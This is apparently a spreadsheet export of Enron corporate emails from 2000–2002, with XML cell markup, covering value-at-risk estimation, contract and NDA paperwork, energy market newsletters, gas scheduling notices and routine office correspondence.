Subject: Re: estimating tail of distribution and additional risk measures  _x000D_
_x000D_
Naveen,_x000D_
the "analytical VAR" approach is working for Equity portfolio. _x000D_
It gives us the tool to examine the tails' behavior for this portfolio and _x000D_
calculate "Expected Tail Loss"._x000D_
The same should be done for commodities portfolio as well._x000D_
_x000D_
Meanwhile, as we discussed, we can give some rough estimates of the losses _x000D_
corresponding to percentiles other than 5th._x000D_
_x000D_
Look at the figure below. You can see VAR numbers for 5%, 1%, 0.5% and 0.1% _x000D_
calculated with _x000D_
1) simulations (100 thousand simulations);_x000D_
2) analytical VAR (gamma-delta positions representation)_x000D_
_x000D_
 1) and 2) are very close because there are not many options in Equity _x000D_
portfolio._x000D_
_x000D_
3) simulations (1000 simulations) to calculate 5% VAR. Then in order to _x000D_
approximately estimate VAR for 1%, 0.5% and 0.1%_x000D_
I scaled 5% VAR with factors corresponding to normal distribution (for _x000D_
example: Norminv(0.001,0,1)/Norminv(0.05,0,1) for 0.1%)._x000D_
The result of such extrapolation in this case is quite good (just 5% _x000D_
different from the correct number). _x000D_
We probably can use such rough estimates of tail for commodities portfolio _x000D_
until we have proper methods implemented. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tanya Tamarchenko_x000D_
02/28/2001 01:17 PM_x000D_
To: Wenyao Jia/HOU/ECT, Debbie R Brackett/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Re: "analytical" var implementation in RisktRAC  _x000D_
_x000D_
Debbie,_x000D_
I am forwarding to you a 2 page document describing implementation of _x000D_
"analytical" VAR in RisktRAC._x000D_
_x000D_
Here is why this effort is very important:_x000D_
1. We need to calculate VAR for other percentile but 5 (1% or even 0.2% as _x000D_
mentioned by Rick Buy)_x000D_
and our simulation model can not handle required number of simulations;_x000D_
2. We need to present additional risk measures (such as Mean Tail Loss) to _x000D_
the Board._x000D_
_x000D_
The analytical approach is implemented in a spreadsheet and fully tested _x000D_
already so there will be no problems_x000D_
with the algorithm itself._x000D_
_x000D_
We need to get together and discuss IT implementation._x000D_
_x000D_
What do you think?_x000D_
_x000D_
Tanya_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 17:41:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 13:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgovenar@govadv.com', 'hgovenar@enron.com', 'harry.kingerski@enron.com', 'sandra.mccubbin@enron.com', 'eric.letke@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Re: SD Cap</t>
  </si>
  <si>
    <t>Hi Hedy, Scott, Sandi:  _x000D_
_x000D_
Any news on signing of SB 43? Eric Letke mentioned that Sony--a potential _x000D_
customer--told him that the Governor signed it on Friday and that they (Sony) _x000D_
had a representative at the signing.  Any news would be great.  Thanks a _x000D_
bunch._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Wed, 12 Apr 2000 08:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Conoco</t>
  </si>
  <si>
    <t xml:space="preserve">David:_x000D_
Here is a draft of the letter to Constellation_x000D_
Carol_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Feb 2002 13:56:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'greg.woulfe@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'benjamin.rogers@enron.com', 'joe.stepenovitch@enron.com'})</t>
  </si>
  <si>
    <t>FW: Enron Voicemail</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jay Hawthorn [mailto:jay@hawthorn.net]_x000D_
Sent: Wednesday, February 13, 2002 3:53 PM_x000D_
To: Suarez, John; buckg@sbcglobal.net; Zimmerman, Grant; Woulfe, Greg;_x000D_
Richard Schneider; Susan Edison_x000D_
Subject: Enron Voicemail_x000D_
_x000D_
_x000D_
http://www.witcity.com/enron/</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 00:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: ERS NDA</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 12/12/2000 08:56 AM -----_x000D_
_x000D_
	Denis O'Connell_x000D_
	12/12/2000 03:35 AM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Matthew Dawson/LON/ECT@ECT, Richard Sage/LON/ECT@ECT, Craig _x000D_
Chaney/HOU/ECT@ECT_x000D_
		 Subject: Re: ERS NDA_x000D_
_x000D_
Done -Richard sewnt it to Craig _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones on 11/12/2000 11:07 CST_x000D_
To: Matthew Dawson/LON/ECT@ECT, Denis O'Connell/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: ERS NDA_x000D_
_x000D_
What's the scoop on getting this signed?_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 12/11/2000 11:09 AM -----_x000D_
_x000D_
	Tana Jones_x000D_
	12/07/2000 10:24 AM_x000D_
		 _x000D_
		 To: Matthew Dawson/LON/ECT@ECT_x000D_
		 cc: Denis O'Connell/LON/ECT@ECT_x000D_
		 Subject: ERS NDA_x000D_
_x000D_
Matt and Denis,_x000D_
_x000D_
Can you help us with this NDA we need executed for an EnronCredit. meeting on _x000D_
Monday?  If you could print it out on EnronCredit.com letterhead and have _x000D_
Denis initial it for signature.  Because of time, Leslie can't initial this _x000D_
before we execute it, but we promise she will initial it before we send it _x000D_
out to the customer.  Then, can you have it executed by an officer of _x000D_
EnronCredit.com and return it to me at fax nol 713/646-3490._x000D_
_x000D_
Thanks for your help!_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 12/07/2000 10:20 AM -----_x000D_
_x000D_
	Leslie Hansen_x000D_
	12/07/2000 08:54 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ERS NDA_x000D_
_x000D_
Tana:_x000D_
_x000D_
Please finalize the ERS Holdings LLC NDA attached below for execution at your _x000D_
earliest convenience._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Leslie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 14:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ALP presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Vince!!_x000D_
_x000D_
I'll take care of the invitations and I am planning to be at the concert on _x000D_
Saturday!_x000D_
_x000D_
Thanks!!_x000D_
_x000D_
--Christie._x000D_
---------------------- Forwarded by Christie Patrick/HOU/ECT on 05/01/2001 _x000D_
09:14 PM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
05/01/2001 04:55 PM_x000D_
To: Christie Patrick/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Kenneth Parkhill/NA/Enron@ENRON, Shirley _x000D_
Crenshaw/HOU/ECT@ECT, Melinda McCarty/Corp/Enron@Enron _x000D_
_x000D_
Subject: ALP presentation_x000D_
_x000D_
Christie,_x000D_
_x000D_
Shirley reserved room 49C1 for Monday 4:00 p.m.  presentation._x000D_
_x000D_
Can you  issue the formal invitation to our guests with the game/dinner_x000D_
details? I don't have all the details regarding the Enron Field_x000D_
box and time. I am out most of the day on Wednesday but we can_x000D_
discuss the details on Thursday. _x000D_
_x000D_
Hope to see you on Saturday at  the concert._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 16:14:29 -0800 (PST)</t>
  </si>
  <si>
    <t>Central American electricity grid takes big step forward</t>
  </si>
  <si>
    <t xml:space="preserve"> =20_x000D_
[IMAGE]=09_x000D_
_x000D_
_x000D_
   [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] =_x000D_
      [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]     =09 [IMAGE] [IMAGE] [=_x000D_
IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMA=_x000D_
GE] [IMAGE]          Updated: Dec. 20, 2001     [IMAGE]      [IMAGE]   [IMA=_x000D_
GE]    [IMAGE] [IMAGE] [IMAGE]           Central American electricity grid =_x000D_
takes big step forward   Two important recent events appear to signal a def=_x000D_
ining moment in the creation of the $320 million Central American Electric =_x000D_
Interconnection System (SIEPEC)-a single transmission line linking the elec=_x000D_
tricity grids of all six... [IMAGE] [IMAGE]         [IMAGE]    [IMAGE] [IMA=_x000D_
GE]       [IMAGE]      [IMAGE] [IMAGE]   [IMAGE]           [IMAGE]   [IMAGE=_x000D_
]           [IMAGE]   [IMAGE]           [IMAGE]   [IMAGE]           [IMAGE]=_x000D_
   [IMAGE]           [IMAGE]   [IMAGE]           [IMAGE]   [IMAGE]         =_x000D_
  [IMAGE]   [IMAGE]           [IMAGE]             [IMAGE] [IMAGE]   [IMAGE]=_x000D_
           [IMAGE]   [IMAGE]          [IMAGE] [IMAGE]             [IMAGE] [=_x000D_
IMAGE]   [IMAGE]          [IMAGE] [IMAGE]     [IMAGE]       Fight over hydr=_x000D_
o project could become war Outcome could set precedent for other relicensin=_x000D_
g   Environmental issues may be deciding factor   [IMAGE] [IMAGE]        [I=_x000D_
MAGE]   [IMAGE]  [IMAGE] [IMAGE]             [IMAGE] [IMAGE]             [I=_x000D_
MAGE] [IMAGE]     [IMAGE]       Enron auditor, SEC official admit failures =_x000D_
Enron withheld vital information  Analysts were slow to drop coverage   [IM=_x000D_
AGE] [IMAGE]        [IMAGE]  [IMAGE]   [IMAGE] [IMAGE]             [IMAGE] =_x000D_
[IMAGE]             [IMAGE] [IMAGE]     [IMAGE]       Power crisis delays d=_x000D_
ecision on Snake River dams Army recommends against breaching  Dam adaptati=_x000D_
on deemed adequate to protect salmon   [IMAGE] [IMAGE]        [IMAGE]   [IM=_x000D_
AGE]  [IMAGE] [IMAGE]             [IMAGE] [IMAGE]             [IMAGE] [IMAG=_x000D_
E]   Bankruptcy judge okays sale of Enron trading operations full story... =_x000D_
 AGA reports largest gas storage withdrawal of season full story...  Interv=_x000D_
entions in Yucca Mountain lawsuit? full story...  Dynegy to buy pre-merger =_x000D_
Texaco gas production full story...  Dynegy wins first round in fight for E=_x000D_
nron pipeline full story...  Mexico, Guatemala to build transmission line l=_x000D_
ink full story...  FERC allows reactivation of Cove Point LNG plant full st=_x000D_
ory...  FERC votes to reopen El Paso California case full story...  Calpine=_x000D_
 looks to sell debentures full story...  NYPA to power wastewater plants wi=_x000D_
th fuel cells full story...  To view all of today's Executive News headline=_x000D_
s,  click here             [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE]         =_x000D_
[IMAGE] [IMAGE]  Copyright ? 2001 - Platts, All Rights Reserved   [IMAGE]  =_x000D_
 Market Brief   Wednesday, December 19 Stocks Close Change % Change DJIA 10=_x000D_
,070.49 72.1  0.72% DJ 15 Util. 288.59 8.9  3.18% NASDAQ 1,982.89 (21.87) -=_x000D_
1.09% S&amp;P 500 1,149.56 6.6  0.58%     Market Vols Close Change % Change AME=_x000D_
X (000) 154,555 41,822.0  37.10% NASDAQ (000) 1,903,206 57,545.0  3.12% NYS=_x000D_
E (000) 1,456,305 126,919.0  9.55%     Commodities Close Change % Change Cr=_x000D_
ude Oil (Jan) 19.36 0.00  0.00% Heating Oil (Jan) 0.5634 0.016  3.00% Nat. =_x000D_
Gas (Henry) 2.61 (0.060) -2.25% Propane (Jan) 32.50 0.60  1.88% Palo Verde =_x000D_
(Jan) 28.00 0.00  0.00% COB (Jan) 28.00 (0.25) -0.88% PJM (Jan) 31.10 0.10 =_x000D_
 0.32%     Dollar US $ Close Change % Change Australia $  1.957 0.017  0.88=_x000D_
% Canada $   1.58 0.001  0.06% Germany Dmark  2.17 0.006  0.28% Euro   0.90=_x000D_
04 (0.002) -0.27% Japan ?en  128.2 0.400  0.31% Mexico NP 9.13 0.040  0.44%=_x000D_
 UK Pound   0.6898 0.0035  0.51%     Foreign Indices Close Change % Change =_x000D_
Arg MerVal 272.76 19.32  7.62% Austr All Ord. 3,267.70 3.30  0.10% Braz Bov=_x000D_
espa 13290.01 (107.35) -0.80% Can TSE 300  7501.10 (85.40) -1.13% Germany D=_x000D_
AX 4984.69 (54.95) -1.09% HK HangSeng 11565.23 78.30  0.68% Japan Nikkei 22=_x000D_
5  10471.93 39.76  0.38% Mexico IPC  6250.74 (18.23) -0.29% UK FTSE 100 5,1=_x000D_
20.60 (30.50) -0.59%       Source:  Yahoo!, TradingDay.com and NYMEX.com   =_x000D_
=09    [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]  =_x000D_
[IMAGE]        [IMAGE] [IMAGE]  [IMAGE]  [IMAGE]     =09  =09_x000D_
_x000D_
_x000D_
 - Market briefs.xls=20_x000D_
 - bug_black.gif</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 06:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'marty.sunde@enron.com', 'linda.robertson@enron.com', 'donald.black@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'keith.holst@enron.com', 'gordon.savage@enron.com', 'sarah.novosel@enron.com', 'rick.buy@enron.com', 'stephen.swain@enron.com', 'richard.sanders@enron.com', 'andre.cangucu@enron.com', 'michael.tribolet@enron.com', 'paul.kaufman@enron.com', 'shelia.benke@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com', 'mike.smith@enron.com', 'mark.haedicke@enron.com', 'mike.grigsby@enron.com', 'phillip.allen@enron.com', 'harry.kingerski@enron.com', 'shari.stack@enron.com', 'roger.yang@enron.com', 'mark.metts@enron.com', 'wanda.curry@enron.com', 'robert.johnston@enron.com', 'robert.williams@enron.com', 'vicki.sharp@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'mitchell.taylor@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>CDWR letter explaining selective payments to ISO</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
Here's a letter detailing my earlier E-mail. - CDWR Letter.pdf</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 04:52:27 -0800 (PST)</t>
  </si>
  <si>
    <t>daily charts 2/5</t>
  </si>
  <si>
    <t xml:space="preserve">The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
_x000D_
Crude     http://www.carrfut.com/research/Energy1/crude77.pdf_x000D_
Natural Gas     http://www.carrfut.com/research/Energy1/ngas77.pdf_x000D_
_x000D_
Dec/Red Dec WTI Spread_x000D_
http://www.carrfut.com/research/Energy1/clz2-clz3.pdf_x000D_
April Heat Crack     http://www.carrfut.com/research/Energy1/heatcrack.pdf_x000D_
April Gas Crack     http://www.carrfut.com/research/Energy1/gascrack.pdf_x000D_
April Gas/Heat Spread_x000D_
http://www.carrfut.com/research/Energy1/huj-hoj.pdf_x000D_
June Gas/Heat Spread_x000D_
http://www.carrfut.com/research/Energy1/HUM-HOM.pdf_x000D_
March Gas/Heat Spread_x000D_
http://www.carrfut.com/research/Energy1/HUH-HOH.pdf_x000D_
March/May Unlead Spread_x000D_
http://www.carrfut.com/research/Energy1/huh-huk.pdf_x000D_
April/Dec Crude oil Spread_x000D_
http://www.carrfut.com/research/Energy1/clj-clz.pdf_x000D_
_x000D_
Nat Gas Strip Matrix_x000D_
http://www.carrfut.com/research/Energy1/StripmatrixNG77.pdf_x000D_
Nat Gas Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixNG77.pdf_x000D_
_x000D_
Crude and Products Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixCL77.pdf_x000D_
_x000D_
_x000D_
Mean Reversion Data on CL &amp; Products Spreads_x000D_
http://www.carrfut.com/research/Energy1/crude02-05-02.pdf_x000D_
_x000D_
EXTRA CHARTS_x000D_
_x000D_
_x000D_
Crude    http://www.carrfut.com/research/Energy1/cl.pdf_x000D_
Bonds     http://www.carrfut.com/research/Energy1/usu.pdf_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 May 2000 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'heidi.withers@enron.com'})</t>
  </si>
  <si>
    <t>Master all points confirm example</t>
  </si>
  <si>
    <t>Heidi,_x000D_
_x000D_
The confirm as requested.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Eric Gillaspie_x000D_
713-345-7667_x000D_
Enron Building 3886</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 03:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'delene.travella@funb.com'})</t>
  </si>
  <si>
    <t>ISDA w/ First Union National Bank</t>
  </si>
  <si>
    <t>Dee:  Let me know if we need to discuss anything.  I am hopeful that we are _x000D_
ready to prepare execution copies.  Regards._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 03/02/2001 11:45 AM -----_x000D_
_x000D_
	Susan Bailey_x000D_
	02/27/2001 08:23 AM_x000D_
		 _x000D_
		 To: &lt;delene.travella@funb.com&gt;_x000D_
		 cc: Sara Shackleton/HOU/ECT@ECT, Paul Radous/Enron@EnronXGate_x000D_
		 Subject: ISDA w/ First Union National Bank_x000D_
_x000D_
Dee,_x000D_
_x000D_
Attached for your review is a blacklined version of the: (a) Schedule and (b) _x000D_
Paragraph 13 to the ISDA Master Agreement.   These have been compared against _x000D_
the draft dated 11/8/2000, and include ENA's accepted changes per your (a) _x000D_
faxed comments transmitted to ENA on January 5, 2001, and  (b) e-mail _x000D_
comments transmitted to ENA on January 19th, 2001._x000D_
_x000D_
We look forward to your response._x000D_
_x000D_
  _x000D_
_x000D_
Cordially,_x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3806A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
E:mail:  Susan.Bailey@enron.com</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 07:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Time Stamp on Stock Quotes</t>
  </si>
  <si>
    <t xml:space="preserve">We may have a problem with adding our own time stamp.  First, I believe our _x000D_
agreement with Reuters limits our ability to modify their content and _x000D_
restricts what we can say about the current nature of the quotes (they are _x000D_
time delayed) and second, we don't want our time stamp to make people believe _x000D_
that the quote was even current as of that time - since it won't be.  It _x000D_
might be ok to have the entire quotes section headed by a line indicating _x000D_
when it was last refreshed.  Many sites providing quotes like this have a _x000D_
line (usually towards the bottom) indicating the delay period and most people _x000D_
using those sites know they have to refresh their screen to update them.  _x000D_
Jason Peters is the expert on the terms of that agreement, so if you still _x000D_
feel like you need to add something you might check with him._x000D_
_x000D_
_x000D_
_x000D_
	James Bruce_x000D_
	06/28/2000 11:26 AM_x000D_
		_x000D_
		 To: Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Time Stamp on Stock Quotes_x000D_
_x000D_
_x000D_
Mark_x000D_
_x000D_
As I understand it, the answer is 'no'--we get a quote from Reuters but not _x000D_
the time stamp.  The time stamp that would appear is the one that we place _x000D_
next to it, telling the user when the quote was placed on the site.  So if _x000D_
you happen along at noon and you see 'ENE 70 9am', you know that you're most _x000D_
certainly not getting a recent price._x000D_
_x000D_
Jay_x000D_
_x000D_
_x000D_
_x000D_
From: Mark Taylor on 28/06/2000 11:05 CDT_x000D_
To: James Bruce/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Time Stamp on Stock Quotes  _x000D_
_x000D_
Will the Reuters feed contain a time stamp?  Some other sites let you know _x000D_
what  time the trade was done that resulted in the quote. _x000D_
_x000D_
_x000D_
_x000D_
	James Bruce_x000D_
	06/28/2000 08:03 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Time Stamp on Stock Quotes_x000D_
_x000D_
_x000D_
Dear Mark_x000D_
_x000D_
Do you know of any legal issue that there could be about adding our own time _x000D_
stamp to a stock quote from Reuters (so that people viewing the site would _x000D_
know when the stock quotes were last updated by us)?_x000D_
_x000D_
Let me know if I should direct this question to someone else._x000D_
_x000D_
Thanks Mark_x000D_
_x000D_
Jay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 03:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cwcass@duke-energy.com', 'bmcmills@duke-energy.com', 'stacey.neuweiler@enron.com', 'jabretz@duke-energy.com', 'wespeckels@duke-energy.com', 'dcspencer@duke-energy.com', 'mrcherry@duke-energy.com', 'jaurbanek@duke-energy.com', 'dfarmer@enron.com', 'briley@enron.com', 'dfbane@duke-energy.com', 'djlevy@duke-energy.com', 'carlos.j.rodriguez@enron.com', 'sbeemer@duke-energy.com'})</t>
  </si>
  <si>
    <t>more information to Eastrans Nominations changes effective 7/29/00</t>
  </si>
  <si>
    <t xml:space="preserve">On Saturday, 7/29/00, 6884 MMBtu was delivered into the Mobil Beaumont_x000D_
redelivery point.  This will be considered a sale into Mobile Beaumont.  There_x000D_
will not be gas redelivered into Mobil Beaumont on July 30th, 31st or August_x000D_
1st._x000D_
---------------------- Forwarded by Marta K Henderson/Houston/PEFS/PEC on_x000D_
07/31/2000 10:17 AM ---------------------------_x000D_
_x000D_
_x000D_
Marta K Henderson_x000D_
07/31/2000 08:47 AM_x000D_
_x000D_
To:   Darrel F. Bane/EastTexas/PEFS/PEC@PEC, John A. Bretz/GCS/CEC/PEC@PEC, _x000D_
Chad_x000D_
      W. Cass/GCS/CEC/PEC@PEC, Michael R. Cherry/EastTexas/PEFS/PEC@PEC, Bruce_x000D_
      McMills/FtWorth/PEFS/PEC@PEC, William E. Speckels/GCS/CEC/PEC@PEC, Donna_x000D_
      C. Spencer/GCS/CEC/PEC@PEC, Julia A. Urbanek/GCS/CEC/PEC@PEC,_x000D_
      briley@enron.com, dfarmer@enron.com, stacey.neuweiler@enron.com,_x000D_
      carlos.j.rodriguez@enron.com, Sharon Beemer/FtWorth/PEFS/PEC@PEC_x000D_
cc:_x000D_
_x000D_
Subject:  Eastrans Nominations changes effective 7/29/00_x000D_
_x000D_
_x000D_
On 7/29/00 the compressor went down for HPL deliveries into Eastrans.  3486_x000D_
MMbtu was delivered on 7/29/00.  Redeliveries for the 29th will be 3486 into _x000D_
HPL_x000D_
from FCV.  The differential of 7800 MMBtu - 3486 MMBtu = 4314 MMBtu will be a_x000D_
sale into HPL._x000D_
_x000D_
On July 30th, 31st and August 1st there is 0 gas flow.  7800 MMBtu per day _x000D_
will_x000D_
be sold into HPL._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 02:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: hi!</t>
  </si>
  <si>
    <t>I am not to picky.  I dated you didn't I?</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 10:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'martha.benner@enron.com', 'mark.witt@enron.com', 'paul.bieniawski@enron.com'})</t>
  </si>
  <si>
    <t>Friday.</t>
  </si>
  <si>
    <t xml:space="preserve">I've just been invited to a couple of meetings on Friday PM--the kind of _x000D_
meetings where the word "invited" is used humorously.  I think I'm still _x000D_
clear after 4:00 pm Omaha time so could be dialed in after then if it would _x000D_
be useful.  Sorry to be such a pain inthe ass but getting fired would be a _x000D_
real inconvenience right now so I'd better post at these meetings.  I'll have _x000D_
Martha coordinate with you guys.  </t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 08:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>#516508 and 516509</t>
  </si>
  <si>
    <t>These deals need contacts added._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>frozenset({'sjensen@bracepatt.com'})</t>
  </si>
  <si>
    <t>Re: Assignment of GE Contract regarding Vitro Project</t>
  </si>
  <si>
    <t xml:space="preserve">Stan, _x000D_
_x000D_
Could you please me send me the electronic file of the executed EPC _x000D_
contracts, including the consolidation agreement?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Stan Jensen" &lt;sjensen@bracepatt.com&gt; on 06/08/2000 02:57:57 PM_x000D_
To: &lt;Jeff.Blumenthal@enron.com&gt;, &lt;kay.mann@enron.com&gt;, _x000D_
&lt;Peggy.Banczak@enron.com&gt;, &lt;Steve.Irvin@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Assignment of GE Contract regarding Vitro Project_x000D_
_x000D_
_x000D_
Following discusions with Kay Mann and Robert Stephens we revised the _x000D_
Assignment Agreement to have the payment terms for the GE Turbine _x000D_
incorporated in the Assignment Agreement and to provide Enron North America _x000D_
the option to have the GE Turbine either returned to it or returned to EEIM _x000D_
upon  termination of the EPC Contract._x000D_
_x000D_
Attached is a revised clean version of the Assignment Agreement and a redline _x000D_
showing how the revised version is different from the original._x000D_
_x000D_
Please feel free to call me at (713) 221-1524 with any questions._x000D_
_x000D_
Stan Jensen_x000D_
_x000D_
 - ASSIGN.doc_x000D_
 - ASSIGNre.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 08:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Seeking opportunity in computational finance</t>
  </si>
  <si>
    <t xml:space="preserve">Larry,_x000D_
_x000D_
Please, take a look at this candidate. I don't_x000D_
think his profile matches my requirements, but he looks quite_x000D_
interesting._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 11/14/2000 _x000D_
04:32 PM ---------------------------_x000D_
_x000D_
_x000D_
"Paul Rowady" &lt;epr@pipeline.com&gt; on 11/14/2000 04:09:43 PM_x000D_
To: "Vince Kaminski" &lt;vkamins@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Seeking opportunity in computational finance_x000D_
_x000D_
_x000D_
Dear Vince:_x000D_
_x000D_
In following up on my voicemail message today, I attach my resume below for_x000D_
your review and consideration._x000D_
_x000D_
It's ironic that you called while I was putting the message together.  I_x000D_
will keep it short and look forward to speaking to you at your convenience._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Paul_x000D_
_x000D_
E. Paul Rowady, Jr._x000D_
2300 West Alabama, Suite 69_x000D_
Houston, Texas  77098_x000D_
_x000D_
713-807-8624   home / fax_x000D_
713-539-4541   mobile_x000D_
epr@pipeline.com_x000D_
_x000D_
 - Paul Rowady2.doc_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 23:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/11/01; HourAhead hour: 7;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/11/01; HourAhead hour: 7;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041107.txt</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 13:44:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>3 Cool Men Movers</t>
  </si>
  <si>
    <t xml:space="preserve">$39 trip charge then $69 an hour_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 10:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>sorry shooter</t>
  </si>
  <si>
    <t>Fri, 13 Jul 2001 03:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christi.nicolay@enron.com', 'susan.scott@enron.com', 'elizabeth.linnell@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>FERC RTO Orders Part 3</t>
  </si>
  <si>
    <t>Southern Company_x000D_
_x000D_
_x000D_
_x000D_
SPP</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 08:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>(01-151) International Energy Week Reception Tickets</t>
  </si>
  <si>
    <t xml:space="preserve">Notice No. 01-151_x000D_
May 2, 2001_x000D_
_x000D_
TO:_x000D_
All NYMEX Division Members/Member Firms_x000D_
All NYMEX Division Clearing Members_x000D_
_x000D_
FROM:_x000D_
Neal Wolkoff, Executive Vice President_x000D_
_x000D_
